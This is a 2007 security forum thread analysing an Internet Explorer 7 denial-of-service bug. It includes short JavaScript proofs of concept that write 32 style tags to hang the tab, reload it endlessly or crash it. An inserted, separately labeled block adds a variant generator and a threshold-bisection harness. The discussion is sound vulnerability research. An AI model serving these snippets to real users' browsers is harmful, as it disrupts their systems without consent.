Sla.ckers.org
How do we crash systems, browsers, or otherwise bring things to a halt, and how do we protect those things? 
The IE <style> DoS
Posted by: shawn
Date: May 07, 2007 11:53PM

I attempted twice to comment on http://ha.ckers.org/blog/20070507/halt-ie70-tab/, and rather than clutter the comments with attempts, I'll post it here where I can preview it...

Weirdness...guessing some sort of a buffer issue, since this still causes the issue (invalid argument line three where it closes the style tag):

<script>
for (var i = 0; i < 32; i++) {
document.write('<style>');
document.write('</style>');
}
</script>

While this doesn't?

<script>
for (var i = 0; i < 31; i++) {
document.write('<style>');
document.write('</style>');
}
</script>

I find it rather odd that combining the two document.write calls does not reproduce it...nor does using any tag other than style. What does the issue itself stem from?

Re: The IE <style> DoS
Posted by: rsnake
Date: May 08, 2007 07:04PM

Thank you for posting it here, btw... I tried to save that post, but for some reason it wasn't letting me. Bummer. Also, thank you for doing more analysis on it, I wasn't able to figure out what was going on - but I was also in a huge hurry when I found it. I did notice that I couldn't combine the two styles too - that's why I left them in there. Weird, huh?

- RSnake
Gotta love it. http://ha.ckers.org

Re: The IE <style> DoS
Posted by: trev
Date: May 09, 2007 11:52AM

Looks more like a failsafe that leaves the parser in a bad state (buffer would overflow at 33 elements and not at 32, so this is likely a chosen threshold). Very interesting...

Edit: Changing the order of document.write statements causes IE7 to reload the page continuously:

<script>
for (var i = 0; i < 32; i++) {
  document.write('</style>');
  document.write('<style>');
}
</script>

No server requests, lots of CPU power burned, but the user interface still stays responsive. And the magic number 32 is still in effect.

I also saw a crash while experimenting with this, trying to reproduce it.

Edit2: I hoped that this reload would allow keeping some JavaScript in memory, but so far I was unsuccessful - it really seems to be a clean reload. Which makes the whole affair even weirder; I have trouble imagining a hack that would produce this kind of bug.
Edited 2 time(s). Last edit at 05/09/2007 01:30PM by trev.

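The two posts above (shawn's 31-vs-32 observation and trev's reversed-order reload variant) are anecdotal single runs. The following is an added example, not code from the thread or from any of its posters: a small generator that emits every variant the thread discusses (iteration count, open-first vs close-first order, combined vs separate document.write calls, and a tag other than style), plus a bisection driver that finds the smallest count at which a pluggable oracle reports the bug. The function names (buildTestCase, findThreshold, modelOracle) are my own. The bundled oracle does not drive a browser; it is a stand-in that models the behaviour reported in the thread so the driver can be exercised offline. To use it for real, replace modelOracle with a function that loads the generated page in the affected IE7 build and reports whether the tab hangs or reloads.

```javascript
// Added example (not from the thread): generate the reproduction variants
// discussed above and bisect the reported threshold with a pluggable oracle.
// buildTestCase, findThreshold and modelOracle are names chosen here.

// Build one HTML test page. The pair of writes is emitted `count` times.
// order: 'open-first' (<style> then </style>, shawn's variant) or
//        'close-first' (</style> then <style>, trev's reload variant).
// combined: fold both writes into one document.write call, which shawn
//           reports does NOT reproduce the issue.
// tag: element name to use instead of style (also reported not to reproduce).
function buildTestCase({ count, order = 'open-first', combined = false, tag = 'style' }) {
  if (!Number.isInteger(count) || count < 0) {
    throw new RangeError('count must be a non-negative integer');
  }
  if (!/^[a-z][a-z0-9]*$/i.test(tag)) {
    throw new RangeError('tag must be a plain element name');
  }
  const open = `<${tag}>`;
  const close = `</${tag}>`;
  const [first, second] = order === 'close-first' ? [close, open] : [open, close];
  const body = combined
    ? `  document.write('${first}${second}');`
    : `  document.write('${first}');\n  document.write('${second}');`;
  return [
    '<script>',
    `for (var i = 0; i < ${count}; i++) {`,
    body,
    '}',
    '</script>',
  ].join('\n');
}

// Binary-search the smallest count in [lo, hi] for which `triggers(html)`
// returns true. Assumes the bug is monotonic in the count (once it fires at
// n it fires for every larger n), which is what 31-vs-32 suggests.
// Returns null when nothing in the range triggers.
function findThreshold(triggers, opts = {}, lo = 0, hi = 256) {
  if (!triggers(buildTestCase({ ...opts, count: hi }))) return null;
  while (lo < hi) {
    const mid = Math.floor((lo + hi) / 2);
    if (triggers(buildTestCase({ ...opts, count: mid }))) {
      hi = mid;
    } else {
      lo = mid + 1;
    }
  }
  return lo;
}

// Stand-in oracle (constructed, not a real browser check): models the thread's
// report that two separate writes of <style>/<\/style>, in either order, trigger
// the bug at 32 or more iterations, while a combined write or another tag does not.
function modelOracle(html) {
  const m = /i < (\d+);/.exec(html);
  const count = m ? Number(m[1]) : 0;
  const separateStyleWrites =
    /document\.write\('<\/?style>'\);\n\s*document\.write\('<\/?style>'\);/.test(html);
  return separateStyleWrites && count >= 32;
}

// Stand-alone usage: print the open-first page at the threshold and the
// thresholds the model oracle yields for each variant.
console.log(buildTestCase({ count: 32 }));
for (const opts of [{}, { order: 'close-first' }, { combined: true }, { tag: 'div' }]) {
  console.log(JSON.stringify(opts), '->', findThreshold(modelOracle, opts));
}

module.exports = { buildTestCase, findThreshold, modelOracle };
```

With a real oracle (a harness that opens the page in IE7 and watches for the hang or the reload loop), the same driver narrows the threshold in about eight page loads instead of the one-at-a-time trial the thread describes, and the variant matrix makes it explicit which of the four knobs actually matters.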
Re: The IE <style> DoS
Posted by: rsnake
Date: May 20, 2007 02:55PM

You have trouble imagining a hack that produces it or uses it?

- RSnake
Gotta love it. http://ha.ckers.org

Re: The IE <style> DoS
Posted by: trev
Date: June 01, 2007 06:21AM

No, I really meant what I said - I wonder what kind of code in Internet Explorer produces this behavior and why it is there. If we knew this, we would probably also see whether there is more to this issue.

Re: The IE <style> DoS
Posted by: ni4ker6mith
Date: October 16, 2008 10:39AM

Thanks for sharing.
